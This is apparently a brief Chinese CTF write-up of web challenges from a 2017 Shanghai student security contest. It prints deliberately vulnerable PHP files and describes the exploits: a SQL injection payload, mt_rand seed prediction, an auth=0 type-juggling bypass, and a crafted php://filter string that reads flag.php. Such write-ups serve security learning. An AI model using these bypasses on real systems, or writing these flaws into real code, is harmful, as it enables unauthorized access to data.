2017上海大学生网络安全大赛 web题

随手做了几题

Some Words

id注入

payload

if(1<>2,1,0)

Welcome To My Blog

index.php?action=flag

直接可以读取源码
不知道后面那个curl干啥用的

Step By Step

index.php

<?php
$seed = rand(0,99999);
mt_srand($seed);
session_start();
function auth_code($length = 12, $special = true)
{
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    if ($special) {
        $chars .= '!@#$%^&*()';
    }
    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
    }
    return $password;
}

$key = auth_code(16, false);
echo "The key is :" . $key . "<br>";
$private = auth_code(10, false);


if(isset($_POST['private'])){
    if($_POST['private'] === $_SESSION["pri"]){
        header("Location:admin.php");
    }else{
        $_SESSION["pri"] = $private;
        die("No private!");
    }
}



?>

admin.php

<?php

if($_GET['authAdmin']!="***********"){
    die("No login!");
}
if(!isset($_POST['auth'])){
    die("No Auth");
}else{
    $auth  = $_POST['auth'];
    $auth_code = "**********";
    if(json_decode($auth) == $auth_code){
        ;
    }else{
        header("Location:index.php");
    }
}
?>

file.php

<?php


if($_POST["auth"]=="***********"){
    if(isset($_GET["id"]) &&  (strpos($_GET["id"],'jpg') !== false))
    {
        $id = $_GET["id"];

        preg_match("/^php:\/\/.*resource=([^|]*)/i", trim($id), $matches);

        if (isset($matches[1]))
            $id = $matches[1];

        if (file_exists("./" . $id) == false)
            die("file not found");
        $img_data = fopen($id,'rb');
        $data  = fread($img_data,filesize($id));
        echo $data;

    }else{
        echo "file not found";
    }
}
?>

php_mt_rand预测index.php中的种子

auth=0绕过admin.php

正则仔细看一遍发现可以通过

php://filtjpger/read=convert.base64-encode/resource=flag.php

绕过前后的判断